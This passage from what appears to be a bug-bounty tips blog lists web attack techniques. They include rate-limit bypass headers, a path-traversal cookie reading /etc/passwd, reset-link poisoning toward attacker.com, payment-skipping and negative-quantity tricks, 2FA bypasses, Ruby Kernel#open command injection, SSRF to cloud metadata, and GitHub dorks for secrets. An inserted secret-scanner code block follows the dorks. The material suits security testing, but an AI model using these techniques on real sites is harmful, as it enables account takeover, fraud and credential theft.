“/snippets” endpoint. </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">3. View internal source code snippets.</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># Ways to bypass rate limiting</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">1. Use the following request header: X-Remote-IP: 127.0.0.1</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">2. Add a space after the parameter value</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">3. Use a null byte or CRLF: '%00, %0d%0a, %09, %20, %0'</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">4. Change user agents and/or cookies</span></div><h3 style="text-align: left;"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><font color="#ff0000"><br /></font></span></h3><h3 style="text-align: left;"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><font color="#ff0000">File Upload</font> </span></h3><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># </span>Extension list for file upload bugs on ASP / ASP.NET: </div><div>".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer", ".shtml"</div><div><br /></div><h3 style="text-align: left;"><font color="#ff0000">Local File Inclusion</font></h3><div># How to find local file read vulnerabilities based on cookies (the cookie value is used server-side as a file path). </div><div>Request </div><div>GET /vulnerable.php HTTP/1.1 </div><div>Cookie:usid=../../../../../../../../../../../../../etc/passwd </div><div><br /></div><div>Response </div><div>HTTP/1.1 200 OK </div><div>... 
</div><div>Server: Apache</div><div>root:fi3sER6:0:1:System Operator:/:/bin/ksh//</div><div><br /></div><div># If you have a cloud system and an LFI, always have a peek at /etc/fstab: you might find more mounts such as S3 buckets or EFS shares with more juice.</div><div><br /></div><div># Escalate local file inclusion</div><div>Try these files: "/proc/self/cmdline" "/proc/self/environ". There might be keys or other sensitive information in there, or they might give you ideas for other paths to investigate.</div><div><br /></div><h3 style="text-align: left;"><font color="#ff0000">Account Takeover</font></h3><div>#</div><div>1. Go to 'forgot password', enter the email and request a reset</div><div>2. Intercept this request.</div><div>3. Add "X-forwarded-host: attacker.com"</div><div>4. Forward this request and check your email inbox.</div><div>5. If the password reset link looks like "http://www.attacker.com/reset-password/<reset_token>", the host is taken from the header, so a victim who clicks such a link sends the token to attacker.com.</div><div>6. To confirm the reset link is valid, replace attacker.com with the original host and open it.</div><div><br /></div><div># Using the password reset code more than once</div><div><br /></div><div>Reset password base64 code/token:</div><div>cGFzc3dvcmR0b2tlbg=</div><div><br /></div><div>Add another equal:</div><div>cGFzc3dvcmR0b2tlbg==</div><div><br /></div><div>Add another equal:</div><div>cGFzc3dvcmR0b2tlbg===</div><div><br /></div><div>Each time you add another equal sign the code works again, typically because the "already used" check compares the raw string while a lenient base64 decoder ignores the extra padding.</div><h3 style="text-align: left;"><font color="#ff0000"><br /></font></h3><h3 style="text-align: left;"><font color="#ff0000">Full Path Disclosure</font></h3><div># A useful tip for finding Full Path Disclosure vulnerabilities </div><div>Drop an array ([] or even [1,2,3]) into a parameter. 
This can produce a full path disclosure error in the response.</div><h3 style="text-align: left;"><font color="#ff0000"><br /></font></h3><h3 style="text-align: left;"><font color="#ff0000">Price Manipulation Bugs</font></h3><div># Bypass the payment process and get the product without paying</div><div><br /></div><div>1. It is preferable to choose PayPal or CoinPayments as the payment method.</div><div>2. Intercept all requests; you may find a parameter called 'Success', 'Referrer' or 'Callback'</div><div>3. If the value inside the parameter is a URL like example.com/payment/MD5HASH, for example</div><div>4. Copy it and open it in a new window; you will find that your payment was marked successful (the callback is trusted without verifying with the payment provider).</div><div><br /></div><div># If the product price parameter cannot be changed, change the quantity of products</div><div><br /></div><div>items[1][quantity]=1 --> 234 $</div><div>items[1][quantity]=0.1 --> 23.4 $</div><div><br /></div><div>Congratulations, you bought the order for 10% of the price.</div><div><br /></div><div># </div><div>1. Add two products to the basket [say a laptop at $40 and a mobile at $70]</div><div>2. If the request is processed in this way : {"items":{"laptop":1,"mobile":1}}</div><div>3. Change the JSON body to {"items":{"laptop":4,"mobile":-2}}</div><div>4. The cost becomes $20 for the two items: 4 * $40 - 2 * $70 = $160 - $140 = $20 (negative quantities are accepted and subtracted from the total)</div><div><br /></div><div><h3 style="text-align: left;"><span style="color: red;">2FA</span></h3># No limit on sending OTP by SMS<br />Impact would be DoS on the user's phone<br /><br /># No limit on refreshing OTP<br />You can "infinitely" brute force the OTP by constantly refreshing it, with a low probability of guessing each round<br /><br /># Brute force the OTP if there is no limit on verification attempts<br /><br /># Check if <br />No 2FA for disabling 2FA in account<br />No 2FA confirmation for password change<br />After 2FA activation other existing sessions are still active<br />You can reuse an OTP from one action for another. 
<br />You can reuse your OTP to log in as another user.<br /><br /># Observed if, after the password check, a valid session has already been created - ignore 2FA <br /><br /># OTP is associated with a token. After refreshing, a new OTP is associated with a new token, but the old pair is still valid.<br /><br /># Sometimes the OTP is leaked in a header, the response body or an error<br /><br /># Try to send OTP requests for different users in the same second.<br /></div><div><br /></div><div><br /></div><div><br /></div><div>Credits:</div><div><div>ADITYASHENDE17, jae_hak99, Random_Robbie, SalahHasoneh1, heald_ben, hsakarp_ilajna, Jhaddix, th3hokag3, Virdoex_hunter, Harshithvelneni, chiraggupta8769, trbughunters, EngMada9, scspcommunity, _n0nce, lutfumertceylan, cybersec_feeds, manas_hunter, AkaaZaan, bpruston, AmitMDubey, hackerscrolls<br /></div></div><div><br /></div><div><br /></div><div>(If you like the blog, share it with others 💓. </div><div>DM or tag me in tweets if you want to include any other bugbountytips in this blog.)</div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com0tag:blogger.com,1999:blog-1382879664613470931.post-89356901814409811622020-07-25T05:54:00.004-07:002020-08-02T08:22:30.218-07:00API Testing ChecklistCheckpoints:<br /><br />1. Older API versions tend to be more vulnerable and lack security mechanisms that were added later.<br />Leverage the predictable nature of REST APIs to find old versions.<br />Saw a call to 'api/v3/login'? Check if 'api/v1/login' exists as well. It might be more vulnerable.<br /><br />2. Never assume there’s only one way to authenticate to an API!<br />Modern apps have many API endpoints for AuthN: `/api/mobile/login` | `/api/v3/login` | `/api/magic_link`; etc. Find and test all of them for AuthN problems.<br /><br />3. 
Remember how SQL Injections used to be extremely common 5-10 years ago, and you could break into almost every company? BOLA (IDOR) is the new epidemic of API security.<br /><br />4. Testing a Ruby on Rails app & noticed an HTTP parameter containing a URL?<br />Developers sometimes use the "Kernel#open" function to access URLs == Game Over.<br />Just send a pipe as the first character and then a shell command (command injection by design: Kernel#open runs the rest of the string as a subprocess when it starts with "|")<br /><br />Reference Link: https://apidock.com/ruby/Kernel/open<br /><br />5. Found SSRF? Use it for:<br />- Internal port scanning<br />- Leverage cloud services (like 169.254.169.254, the cloud metadata endpoint)<br />- Use http://webhook.site to reveal the IP address & HTTP library<br />- Download a very large file (Layer 7 DoS)<br />- Reflective SSRF? Disclose local management consoles<br /><br />6. Mass Assignment is a real thing.<br />Modern frameworks encourage developers to use MA without understanding the security implications.<br />During exploitation, don't guess the object's property names; simply find a GET endpoint that returns all of them. <br /><br />7. A company exposes an API for developers?<br />This is not the same API that is used by the mobile / web application. Always test them separately.<br />Don't assume they implement the same security mechanisms.<br /><br />8. Check if the API supports SOAP also.<br />Change the content-type to "application/xml", add a simple XML in the request body, and see how the API handles it.<br /><br />9. IDs in the HTTP bodies/headers tend to be more vulnerable than IDs in URLs. Try to focus on them first.<br /><br />10. Exploiting BFLA (Broken Function Level Authorization)?<br />Leverage the predictable nature of REST to find admin API endpoints!<br />E.g: you saw the following API call `GET /api/v1/users/<id>`<br />Give it a chance and change the method to DELETE / POST to delete/create users<br /><br />11. The API uses Authorization header? 
Forget about CSRF!<br />If the authentication mechanism doesn't support cookies, the API is protected against CSRF by design (the browser never attaches the token automatically).<br /><br />12. Even if the ID is a GUID or non-numeric, try to send a numeric value.<br />For example: "/?user_id=111" instead of "user_id=inon@traceable.ai"<br />Sometimes the AuthZ mechanism supports both, and it's easier to brute force numbers.<br /><br />13. Use Mass Assignment to bypass security mechanisms.<br />E.g., "enter password" mechanism:<br />- `POST /api/rest_pass` requires the old password.<br />- `PUT /api/update_user` is vulnerable to MA == can be used to update the password without sending the old one (for CSRF)<br /><br />14. Got stuck during an API pentest? Expand your attack surface! Find sub/sibling domains using http://Virustotal.com & http://Censys.io. <br />Some of these domains might expose the same APIs with different configurations/versions.<br /><br />15. Static resource==photo,video,..<br />Web servers (IIS, Apache) treat static resources differently when it comes to authorization.<br />Even if developers implemented decent authorization, there's a good chance you can access static resources of other users.<br /><br />16. Even if you use another web proxy, always use Burp in the background. <br />The guys at @PortSwigger are doing a really good job at helping you manage your pentest.<br />Use the “tree view” (free version) feature to see all API endpoints you’ve accessed.<br /><br />17. Mobile certificate pinning?<br />Before you start reverse engineering & patching the client app, check both the iOS & Android clients and older versions of them.<br />There's a decent chance that pinning isn't enabled in one of them. Save time.<br /><br />18. Companies & developers tend to put more resources (including security) into the main APIs.<br />Always look for the most niche features that nobody uses to find interesting vulnerabilities.<br />"POST /api/profile/upload_christmas_voice_greeting"<br /><br />19. 
Which features do you find tend to be more vulnerable? <br />I'll start: <br />- Organization's user management <br />- Export to CSV/HTML/PDF <br />- Custom views of dashboards <br />- Sub user creation & management <br />- Object sharing (photos, posts, etc)<br /><br />20. Testing AuthN APIs?<br />If you test in production, there's a good chance that AuthN endpoints have anti brute-force protection.<br />However, DevOps engineers tend to disable rate limiting in non-production environments. Don't forget to test them :)<br /><br />21. Got stuck during an API pentest? Expand the attack surface! <br />Use the Wayback Machine (http://web.archive.org), find old versions of the web app and explore new API endpoints. <br />Can't use the client? Scan the .js files for URLs. Some of them are API endpoints.<br /><br />22. APIs tend to leak PII by design.<br />BE engineers return raw JSON objects and rely on FE engineers to filter out sensitive data.<br />Found a sensitive resource (e.g., "receipt")? Find all the endpoints that return it: "/download_receipt", "/export_receipt", etc.<br /><br />23. Found a way to download arbitrary files from a web server? <br />Shift the test from black-box to white-box.<br />Download the source code of the app (DLL files: use ILSpy; compiled Java: use Luyten)<br />Read the code and find new issues!<br /><br />24. Remember: developers often disable security mechanisms in non-production environments (qa/staging/etc); <br />Leverage this fact to bypass AuthZ, AuthN, rate limiting & input validation.<br /><br />25. Found an "export to PDF" feature? <br />There's a good chance the developers use an external library to convert HTML --> PDF behind the scenes.<br />Try to inject HTML elements and cause "Export Injection" (the converter may fetch arbitrary URLs or local files while rendering your markup).<br /><br />26. AuthZ bypass tricks:<br />* Wrap ID with an array {“id”:111} --> {“id”:[111]}<br />* JSON wrap {“id”:111} --> {“id”:{“id”:111}}<br />* Send ID twice URL?id=<LEGIT>&id=<VICTIM><br />* Send wildcard {"user_id":"*"}<br /><br />27. 
Back-end servers are no longer the only place XSS is handled.<br />APIs don't return HTML, but JSON instead.<br />If the API returns an XSS payload, e.g. {"name":"In<script>alert(21)</script>on"}, that's fine as long as the client encodes it on output; the protection needs to be on the client side.<br />Caveat: the API must still respond with Content-Type: application/json (and X-Content-Type-Options: nosniff); a JSON body served as text/html is ordinary reflected XSS.<div><br /></div><div>28. Always try sending an invalid Content-Type; the error response sometimes lists hidden endpoints.</div><div><br /></div><div>29. <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Found a GraphQL endpoint? <br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Send the following introspection query to list the whole schema of the endpoint. It will list all objects and the fields they have. <br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">
{__schema{types{name,kind,description,fields{name,type{name}}}}} <br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"></span><br /><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">PS: It doesn't work if introspection is disabled.</span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">30. </span><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">GitHub dorks for finding API keys, tokens and passwords <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">api_key <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">"api keys" <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">authorization_bearer: <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">oauth <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">auth <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">authentication <br /></span></span></div><div><span class="css-901oao css-16my406 
r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">client_secret <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">api_token: <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">"api token" <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">client_id <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">password <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">user_password <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">user_pass <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">passcode <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">client_secret <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">secret <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x 
r-bcqeeo r-qvutc0">password hash <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">OTP <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">user auth</span></span></div><div><br /><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">
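The same dork terms make a usable keyword list for scanning your own repositories before a push, which is the defender's side of this tip. The following scanner is an added example, not code from the original post or from the credited authors: it applies the terms above to constructed file content and reports matching lines with the values redacted; the placeholder list and the eight-character minimum are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List

# Keyword list taken from the dork list above (the duplicate entry dropped).
DORK_TERMS = [
    "api_key", "api keys", "authorization_bearer", "oauth", "auth",
    "authentication", "client_secret", "api_token", "api token", "client_id",
    "password", "user_password", "user_pass", "passcode", "secret",
    "password hash", "OTP", "user auth",
]
# Longest terms first so "authorization_bearer" wins over "auth"; a space in a
# term may appear as a space, underscore or dash in real files.
_ALT = "|".join(t.replace(" ", "[ _-]")
                for t in sorted(DORK_TERMS, key=len, reverse=True))
_TERM_RE = re.compile(r"(?i)\b(" + _ALT + r")\b\s*[:=]\s*['\"]?([^'\"\s,;]+)")
MIN_LEN = 8  # assumption: shorter values are rarely real credentials
_PLACEHOLDER = ("changeme", "example", "placeholder", "xxx", "todo", "<", "${",
                "os.environ", "getenv")  # assumption: common non-secret markers

@dataclass
class Finding:
    line_no: int
    term: str
    redacted: str  # only a short prefix of the value is kept in the report

def _looks_like_placeholder(value: str) -> bool:
    low = value.lower()
    return any(p in low for p in _PLACEHOLDER)

def scan_text(text: str) -> List[Finding]:
    """One Finding per dork term that is followed by a credential-like value."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in _TERM_RE.finditer(line):
            term, value = m.group(1), m.group(2)
            if len(value) < MIN_LEN or _looks_like_placeholder(value):
                continue
            findings.append(Finding(line_no, term.lower(), value[:4] + "***"))
    return findings

# Constructed sample file content; none of these values is a real credential.
SAMPLE = """\
api_key = "c0nstructed_9f8e7d6c5b4a3b2c"
client_secret: ${CLIENT_SECRET}
password = changeme
user_pass = "hunter2hunter2"
OTP length is 6 digits
authorization_bearer: eyJhbGciOiJIUzI1NiJ9.constructedtoken
"""
```

Running `scan_text(SAMPLE)` reports lines 1, 4 and 6; the environment reference, the `changeme` placeholder and the prose mention of OTP are skipped.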
</span></div><div><br />Credits: traceableai, s0md3v, D0cK3rG33k<br /></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com4tag:blogger.com,1999:blog-1382879664613470931.post-89298454686624611532017-11-17T23:27:00.001-08:002020-07-30T13:02:11.826-07:00About Me.<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9sFzJGl1gp8QXoxdsUYfXUPKnXQHkUe3cxpFIKSlx6HB6k10Gkjpq8eHh9kz0KXevITjVW5hdiebDwjzMvOuHgJp0MBsHpSq30mDdb_afrQNppdbLtaiFJbXoBTN8i_pRmQC7Tp5ecA/s1600/me.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="852" data-original-width="852" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9sFzJGl1gp8QXoxdsUYfXUPKnXQHkUe3cxpFIKSlx6HB6k10Gkjpq8eHh9kz0KXevITjVW5hdiebDwjzMvOuHgJp0MBsHpSq30mDdb_afrQNppdbLtaiFJbXoBTN8i_pRmQC7Tp5ecA/s320/me.jpg" width="320" /></a></div>
<br />
<br />
<span style="color: lime; font-family: "courier new" , "courier" , monospace;"><b style="background-color: black;"><span style="background-color: black;">I am a security enthusiast in the areas of web applications, network engineering & mobile applications; programming is also a part of my interests (Python lover :p). I also work as an individual web-application security engineer with broad experience in all aspects of security management and implementation. I am looking forward to hardening my skills in various security standards. As a part of my core interest, I always prefer spending my leisure time performing individual security audits, vulnerability assessments or source code analysis. I am also a bug bounty hunter. I participated in all major bug bounty programs organised by internet giants like Google, Microsoft, Apple, Bugcrowd, etc. I have 4+ years of expertise in both black box as well as white box penetration testing</span><span style="background-color: black; font-size: 13px;">.</span></b></span><br />
<span style="background-color: white; color: lime;"><span style="font-family: "courier new", "courier", monospace;"><b><span style="font-size: 13px;"><br /></span></b></span></span><br />
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; font-size: 13px;"><b><br /></b></span></span>
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><span style="font-size: 13px;"><b style="background-color: black;"><a href="https://twitter.com/www_latish" target="_blank">Twitter</a>: </b></span></span><br />
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; font-size: 13px;"><br /></span></span>
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><span style="font-size: 13px;"><a href="https://www.facebook.com/latish.danawale.14" style="background-color: black;" target="_blank">Facebook</a></span></span><br />
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><br /></span>
</div>
Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com0